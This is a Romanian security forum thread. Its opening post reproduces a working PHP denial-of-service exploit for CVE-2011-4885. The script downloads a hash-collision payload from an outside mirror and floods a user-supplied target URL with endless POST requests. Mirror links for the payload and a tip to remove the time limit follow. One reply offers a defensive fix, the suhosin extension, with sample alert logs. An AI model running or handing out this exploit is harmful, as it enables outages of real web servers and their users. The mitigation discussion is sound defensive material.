denjacker Posted January 1, 2012 Report Posted January 1, 2012 (edited) # Exploit Title: CVE-2011-4885 PHP Hashtables Denial of ServiceExploit # Date: 1/1/12 # Author: infodox # Software Link: php.net #Version: 5.3.* # Tested on: Linux # CVE : CVE-2011-4885 ExploitDownload -- http://infodox.co.cc/Downloads/phpdos.txt <?php/*PHP 5.3.* Hash Colission DoS Exploit by infodoxOriginal version by itz me (opensc.ws)CVE-2011-4885Mirrors List:http://www.exploit-db.com/sploits/hashcollide.txthttp://compsoc.nuigalway.ie/~infodox/hashcollide.txthttp://jrs-s.net/hashcollide.txthttp://www.infodox.co.cc/Downloads/hashcollide.txtChanges:Different mirror for hashcollide.txtNow takes target as a command line argumentStatus message printingTwitter: @info_doxBlog: blog.infodox.co.ccSite: http://www.infodox.co.cc/*/@set_time_limit(0);$targ = $argv[1];$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...while(1) { echo "firing"; $ch = curl_init("$targ"); curl_setopt($ch, CURLOPT_POSTFIELDS, $x); curl_exec($ch); curl_close($ch); echo "[+] Voly Sent!";}?>LE: am pus si set_time_limit Edited January 1, 2012 by denjacker Quote
Nytro Posted January 1, 2012 Report Posted January 1, 2012 Pe scurt, trimite prin POST 65535 de variabile.Puneti voi la inceputul scriptului un set_time_limit(0) pentru ca implicit e 30 de secunde. Quote
aelius Posted January 1, 2012 Report Posted January 1, 2012 (edited) Quick fix - Install suhosin. - Read the fine manualDemo:~ # tail -f /var/log/user.log==> /var/log/user.log <==Jan 1 19:18:44 saturn suhosin[1465271]: ALERT - configured POST variable limit exceeded - dropped variable 'EzEzEzFYEzEzEzEz' (attacker '78.42.187.xx', file '/home/tex/www/<hidden>')Jan 1 19:18:51 saturn suhosin[1465326]: ALERT - configured POST variable limit exceeded - dropped variable 'EzEzEzFYEzEzEzEz' (attacker '78.42.187.xx', file '/home/tex/www/<hidden>') Edited January 1, 2012 by aelius add demo 1 Quote
